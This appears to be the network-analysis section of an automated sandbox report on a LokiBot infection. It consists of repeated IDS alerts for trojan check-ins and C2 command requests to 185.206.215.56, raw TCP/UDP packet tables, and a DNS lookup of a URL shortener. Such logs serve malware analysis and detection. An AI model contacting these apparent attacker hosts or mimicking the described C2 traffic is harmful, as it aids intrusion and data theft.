                                                                                        01/05/21-19:07:10.663115TCP2025381ET TROJAN LokiBot Checkin4933080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.663115TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.820501TCP2025483ET TROJAN LokiBot Fake 404 Response8049330185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:11.027929TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.027929TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.027929TCP2025381ET TROJAN LokiBot Checkin4933180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.027929TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.198428TCP2025483ET TROJAN LokiBot Fake 404 Response8049331185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:11.409139TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.409139TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.409139TCP2025381ET TROJAN LokiBot Checkin4933280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.409139TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.568467TCP2025483ET TROJAN LokiBot Fake 404 Response8049332185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:11.779641TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.779641TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.779641TCP2025381ET TROJAN LokiBot Checkin4933380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.779641TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:11.948839TCP2025483ET TROJAN LokiBot Fake 404 Response8049333185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:12.151046TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.151046TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.151046TCP2025381ET TROJAN LokiBot Checkin4933480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.151046TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.322356TCP2025483ET TROJAN LokiBot Fake 404 Response8049334185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:12.528628TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.528628TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.528628TCP2025381ET TROJAN LokiBot Checkin4933580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.528628TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.702702TCP2025483ET TROJAN LokiBot Fake 404 Response8049335185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:12.913605TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.913605TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.913605TCP2025381ET TROJAN LokiBot Checkin4933680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:12.913605TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.081152TCP2025483ET TROJAN LokiBot Fake 404 Response8049336185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:13.293357TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.293357TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.293357TCP2025381ET TROJAN LokiBot Checkin4933780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.293357TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.445018TCP2025483ET TROJAN LokiBot Fake 404 Response8049337185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:13.661854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.661854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.661854TCP2025381ET TROJAN LokiBot Checkin4933880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.661854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:13.836048TCP2025483ET TROJAN LokiBot Fake 404 Response8049338185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:14.047995TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.047995TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.047995TCP2025381ET TROJAN LokiBot Checkin4933980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.047995TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.227580TCP2025483ET TROJAN LokiBot Fake 404 Response8049339185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:14.442937TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.442937TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.442937TCP2025381ET TROJAN LokiBot Checkin4934080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.442937TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.596332TCP2025483ET TROJAN LokiBot Fake 404 Response8049340185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:14.806537TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.806537TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.806537TCP2025381ET TROJAN LokiBot Checkin4934180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.806537TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:14.974222TCP2025483ET TROJAN LokiBot Fake 404 Response8049341185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:15.187360TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.187360TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.187360TCP2025381ET TROJAN LokiBot Checkin4934280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.187360TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.351310TCP2025483ET TROJAN LokiBot Fake 404 Response8049342185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:15.557295TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.557295TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.557295TCP2025381ET TROJAN LokiBot Checkin4934380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.557295TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.731776TCP2025483ET TROJAN LokiBot Fake 404 Response8049343185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:15.953688TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.953688TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.953688TCP2025381ET TROJAN LokiBot Checkin4934480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:15.953688TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.112186TCP2025483ET TROJAN LokiBot Fake 404 Response8049344185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:16.321602TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.321602TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.321602TCP2025381ET TROJAN LokiBot Checkin4934580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.321602TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.490419TCP2025483ET TROJAN LokiBot Fake 404 Response8049345185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:16.691140TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.691140TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.691140TCP2025381ET TROJAN LokiBot Checkin4934680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.691140TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:16.849536TCP2025483ET TROJAN LokiBot Fake 404 Response8049346185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:17.070972TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.070972TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.070972TCP2025381ET TROJAN LokiBot Checkin4934780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.070972TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.241789TCP2025483ET TROJAN LokiBot Fake 404 Response8049347185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:17.441718TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.441718TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.441718TCP2025381ET TROJAN LokiBot Checkin4934880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.441718TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.595691TCP2025483ET TROJAN LokiBot Fake 404 Response8049348185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:17.814658TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.814658TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.814658TCP2025381ET TROJAN LokiBot Checkin4934980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.814658TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:17.974679TCP2025483ET TROJAN LokiBot Fake 404 Response8049349185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:18.170246TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.170246TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.170246TCP2025381ET TROJAN LokiBot Checkin4935080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.170246TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.342973TCP2025483ET TROJAN LokiBot Fake 404 Response8049350185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:18.546784TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.546784TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.546784TCP2025381ET TROJAN LokiBot Checkin4935180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.546784TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.726488TCP2025483ET TROJAN LokiBot Fake 404 Response8049351185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:18.940629TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.940629TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.940629TCP2025381ET TROJAN LokiBot Checkin4935280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:18.940629TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.100818TCP2025483ET TROJAN LokiBot Fake 404 Response8049352185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:19.314073TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.314073TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.314073TCP2025381ET TROJAN LokiBot Checkin4935380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.314073TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.472804TCP2025483ET TROJAN LokiBot Fake 404 Response8049353185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:19.678882TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.678882TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.678882TCP2025381ET TROJAN LokiBot Checkin4935480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.678882TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:19.836989TCP2025483ET TROJAN LokiBot Fake 404 Response8049354185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:20.060760TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.060760TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.060760TCP2025381ET TROJAN LokiBot Checkin4935580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.060760TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.222456TCP2025483ET TROJAN LokiBot Fake 404 Response8049355185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:20.437125TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.437125TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.437125TCP2025381ET TROJAN LokiBot Checkin4935680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.437125TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.607773TCP2025483ET TROJAN LokiBot Fake 404 Response8049356185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:20.817267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.817267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.817267TCP2025381ET TROJAN LokiBot Checkin4935780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.817267TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:20.984601TCP2025483ET TROJAN LokiBot Fake 404 Response8049357185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:21.198560TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.198560TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.198560TCP2025381ET TROJAN LokiBot Checkin4935880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.198560TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.387078TCP2025483ET TROJAN LokiBot Fake 404 Response8049358185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:21.572190TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14935980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.572190TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4935980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.572190TCP2025381ET TROJAN LokiBot Checkin4935980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.572190TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24935980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:21.741504TCP2025483ET TROJAN LokiBot Fake 404 Response8049359185.206.215.56192.168.2.22

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 5, 2021 19:05:20.748044014 CET49165443192.168.2.22104.22.0.232
                                                                                        Jan 5, 2021 19:05:20.788083076 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:20.788252115 CET49165443192.168.2.22104.22.0.232
                                                                                        Jan 5, 2021 19:05:20.805231094 CET49165443192.168.2.22104.22.0.232
                                                                                        Jan 5, 2021 19:05:20.845263958 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:20.849673986 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:20.849720001 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:20.849750996 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:20.849864960 CET49165443192.168.2.22104.22.0.232
                                                                                        Jan 5, 2021 19:05:20.865313053 CET49165443192.168.2.22104.22.0.232
                                                                                        Jan 5, 2021 19:05:20.905706882 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:20.905836105 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:21.109913111 CET49165443192.168.2.22104.22.0.232
                                                                                        Jan 5, 2021 19:05:22.187321901 CET49165443192.168.2.22104.22.0.232
                                                                                        Jan 5, 2021 19:05:22.227421999 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.369307995 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.369350910 CET44349165104.22.0.232192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.369590998 CET49165443192.168.2.22104.22.0.232
                                                                                        Jan 5, 2021 19:05:22.448667049 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.499711990 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.499824047 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.500040054 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.550899029 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.551645994 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.551749945 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.551772118 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.551798105 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.551816940 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.551848888 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.551855087 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.551868916 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.551882982 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.551893950 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.551913023 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.551933050 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.551975965 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.602938890 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.602984905 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603022099 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603055954 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603085041 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.603097916 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603123903 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603127003 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.603161097 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603183031 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.603185892 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603223085 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603244066 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.603249073 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603286028 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603319883 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603353024 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.603360891 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603387117 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603424072 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603449106 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603452921 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.603483915 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603509903 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.603511095 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.605087996 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.654531002 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.654580116 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.654618979 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.654643059 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.654666901 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.654680014 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.654695988 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.654706001 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.654753923 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.654783010 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.654818058 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.654833078 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.654844046 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.654879093 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.654881001 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.654906034 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.654942036 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.654966116 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.654969931 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.655011892 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.655029058 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.655042887 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.655078888 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.655106068 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.655142069 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.655143976 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.655164957 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.655200958 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.655225992 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.655226946 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.655272007 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.655276060 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:22.655301094 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.655339956 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.655359030 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.655388117 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.655412912 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.655422926 CET4916780192.168.2.2283.172.144.37

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 5, 2021 19:05:20.671252966 CET5219753192.168.2.228.8.8.8
                                                                                        Jan 5, 2021 19:05:20.727847099 CET53521978.8.8.8192.168.2.22
                                                                                        Jan 5, 2021 19:05:21.293368101 CET5309953192.168.2.228.8.8.8
                                                                                        Jan 5, 2021 19:05:21.351258039 CET53530998.8.8.8192.168.2.22
                                                                                        Jan 5, 2021 19:05:21.357091904 CET5283853192.168.2.228.8.8.8
                                                                                        Jan 5, 2021 19:05:21.415157080 CET53528388.8.8.8192.168.2.22
                                                                                        Jan 5, 2021 19:05:22.378812075 CET6120053192.168.2.228.8.8.8
                                                                                        Jan 5, 2021 19:05:22.447736979 CET53612008.8.8.8192.168.2.22

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                        Jan 5, 2021 19:05:20.671252966 CET192.168.2.228.8.8.80xad13Standard query (0)cutt.lyA (IP address)IN (0x0001)
